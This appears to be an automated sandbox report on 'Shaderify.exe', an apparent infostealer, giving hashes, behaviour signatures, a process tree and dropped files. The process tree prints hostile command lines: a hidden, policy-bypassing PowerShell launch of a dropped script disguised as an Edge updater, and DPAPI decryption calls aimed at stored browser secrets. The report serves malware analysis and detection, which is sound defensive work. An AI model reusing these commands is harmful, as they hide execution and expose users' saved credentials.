Analysis

  • max time kernel
    148s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 09:47

General

  • Target

    Shaderify.exe

  • Size

    120.4MB

  • MD5

    2776d64baf7179ce926864738c2e8939

  • SHA1

    b55826db4d6ca723869256b97af48761950677a0

  • SHA256

    287b3a16f8e654deb64eb2fd9039803de16a81d17f55a140814ce7dda7f56d96

  • SHA512

    b397926546ad482ab45a65cabb4668997ac0553786c98e8b1cc09cf4706378b8a8b53a30f27665ebbfc84bb66422c36b152a644be4438ba313714703d7cdc7b2

  • SSDEEP

    1572864:o1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Nasulbg8yTnbEOz

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
    "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4124
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp" "c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP"
            5⤵
              PID:1924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:656
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3876
      • C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
        "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
        2⤵
          PID:3320
        • C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
          "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2184 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1688
        • C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
          "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:2
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5072
      • C:\Windows\System32\CompPkgSrv.exe
        C:\Windows\System32\CompPkgSrv.exe -Embedding
        1⤵
          PID:1908

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\edge\Updater\Get-Clipboard.ps1

          Filesize

          3KB

          MD5

          52cc110bb3777aa6bba7900630d4eb49

          SHA1

          3663dc658fd13d407e49781d1a5c2aa203c252fc

          SHA256

          892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6

          SHA512

          89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f48896adf9a23882050cdff97f610a7f

          SHA1

          4c5a610df62834d43f470cae7e851946530e3086

          SHA256

          3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

          SHA512

          16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          895e2a42e94e9cd0f28eaa2b6ecc01c2

          SHA1

          1853f120520e8fa793825de95434557215ee0b1f

          SHA256

          2930446921bad0e440a607731e8488965a039dd60ef8432fbf0d2412d4e1dae7

          SHA512

          acd1c8d88d69788f03d50224413fcae52d026b01b6bc311570114d68aed1fbbfeac67d9361115d9386555239c50ea490985d3f375d6a3b49339b7f960154d4f0

        • C:\Users\Admin\AppData\Local\Temp\6fd5f1a7-81b0-4b07-9a50-3e49240a1501.tmp.node

          Filesize

          1.4MB

          MD5

          56192831a7f808874207ba593f464415

          SHA1

          e0c18c72a62692d856da1f8988b0bc9c8088d2aa

          SHA256

          6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

          SHA512

          c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

        • C:\Users\Admin\AppData\Local\Temp\Admincookies.zip

          Filesize

          22B

          MD5

          76cdb2bad9582d23c1f6f4d868218d6c

          SHA1

          b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

          SHA256

          8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

          SHA512

          5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

        • C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp

          Filesize

          1KB

          MD5

          cbddbe67e099b2400e5c3afeb2315f17

          SHA1

          cc8bcf8edbfdbe6520e4b484648752ef7d0a9e43

          SHA256

          5b1571e9ecbdb663625181683d64586c3ec9766a3dd59d66850bcbe7c9b1259c

          SHA512

          c5f9a2af35455c2321f68a98660828edde4dd82724611638c351440560009c3fa1bc5fe6365403c1c6231990a7eac25b578a0f5b44882c12ee5f701ef3bea723

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ek2nip.huh.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.dll

          Filesize

          3KB

          MD5

          5b55dc709f69b621430f4a7455417228

          SHA1

          92a8727041b3ffaeb82659f52c952834ab16e89d

          SHA256

          805d2635a07e5920d7c3da733094872368778f077c121ff9f876ede1f4575b02

          SHA512

          ee521dac7b1a51f19da9abfc26861737e0aa20c1bf9e498ebceff7a0866585597e7dbf0218e699f6743b6644bba83047e48d3fed2735ae9a729561f77caf466e

        • \??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP

          Filesize

          652B

          MD5

          0d66267aad53025049acbd10e4f1b994

          SHA1

          cdb2f831b62a9899dc10d899cac2af6c6727d6d9

          SHA256

          b177e4615b779ef9018f2546d3575763087e68cb59254be41aac20a7a7e4ace7

          SHA512

          e9459f4b0d45a46d0285d53a992f9fbbb290b7b018aabfb16727a2cc164cdffe5e12335d10e2e26513bd79e746df031630c12c2b678ee2bb9e42611cb1e931e7

        • \??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.0.cs

          Filesize

          426B

          MD5

          b462a7b0998b386a2047c941506f7c1b

          SHA1

          61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

          SHA256

          a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

          SHA512

          eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

        • \??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline

          Filesize

          369B

          MD5

          0dad2a256aacf25ea2d570c6015d33d1

          SHA1

          301639d7e32a844b25290d13ae1e09a06cf56589

          SHA256

          38063aea7398717e64557d2619ec90a0725ff174cf66e2191a6d03c09fabcaa9

          SHA512

          76469bfbf8b8fe87e137b87550710ea852fa91e7ba582012ea06deec2c7540cf11bbe4ab70064e99b7e178325031415c79abef82e71b80bd4959ac98b9146dd8

        • memory/1592-43-0x0000021030E30000-0x0000021030E80000-memory.dmp

          Filesize

          320KB

        • memory/3320-68-0x00007FFE32950000-0x00007FFE32951000-memory.dmp

          Filesize

          4KB

        • memory/3320-87-0x0000021BCF900000-0x0000021BCFA2A000-memory.dmp

          Filesize

          1.2MB

        • memory/4124-30-0x00000213AFA90000-0x00000213AFA98000-memory.dmp

          Filesize

          32KB

        • memory/4124-7-0x00000213AF5D0000-0x00000213AF5F2000-memory.dmp

          Filesize

          136KB